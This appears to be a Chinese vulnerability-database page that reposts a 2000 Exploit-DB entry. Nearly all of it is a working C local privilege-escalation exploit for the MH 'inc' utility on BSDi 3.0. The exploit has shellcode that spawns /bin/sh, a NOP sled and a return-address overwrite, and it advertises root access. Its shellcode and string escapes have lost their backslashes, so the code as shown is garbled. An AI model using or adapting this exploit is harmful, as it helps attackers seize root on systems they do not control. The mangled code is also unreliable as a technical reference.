BSDi 3.0 inc – Local Buffer Overflow / Local Privilege Escalation-安全小百科

BSDi 3.0 inc – Local Buffer Overflow / Local Privilege Escalation

漏洞ID	1053493	漏洞类型
发布时间	2000-11-30	更新时间	2000-11-30
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	BSD	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/207

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
   (BSDi)inc[mh] buffer overflow, by v9[[email protected]].
   this is will give you euid=0(root) on BSDi/3.0 systems.
*/

#define PATH		"/usr/contrib/mh/bin/inc"  /* path to inc on BSDi/3.0 */
#define BUFFER		2048                       /* no need to change this. */
#define DEFAULT_OFFSET	-7000                      /* generalized offset.     */

static char exec[]=
 "xebx1fx5ex31xc0x89x46xf5x88x46xfax89x46x0c" /* 14 characters. */
 "x89x76x08x50x8dx5ex08x53x56x56xb0x3bx9axff" /* 14 characters. */
 "xffxffxffx07xffxe8xdcxffxffxffx2fx62x69x6e" /* 14 characters. */
 "x2fx73x68x00";                    /* 4 characters; 46 characters total. */

long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
  char eip[BUFFER],buf[4096];
  int i,offset;
  long ret;
  printf("[ (BSDi)inc[mh]: buffer overflow, by: v9[[email protected]]. ]n");
  if(argc>1){offset=atoi(argv[1]);}
  else{offset=DEFAULT_OFFSET;}
  ret=(pointer()-offset);
  eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
  for(i=3;i<BUFFER;i+=4){*(long *)&eip[i]=ret;}
  eip[BUFFER]=0x0;
  for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
  memcpy(buf+i,exec,strlen(exec));
  memcpy(buf,"EXEC=",5);putenv(buf);
  printf("*** [data]: return address: 0x%lx, offset: %d.n",ret,offset);
  if(execlp(PATH,"inc","-file",eip,0)){
    printf("*** [error]: could not execute %s successfully.n",PATH);
    exit(1);
  }
}


// milw0rm.com [2000-11-30]

相关推荐: Microsoft IIS 4.0 Chunked Transfer Encoding Buffer Overflow Vulnerability

Microsoft IIS 4.0 Chunked Transfer Encoding Buffer Overflow Vulnerability 漏洞ID 1104299 漏洞类型 Boundary Condition Error 发布时间 2000-03-…

文章版权归作者所有，未经允许请勿转载。

THE END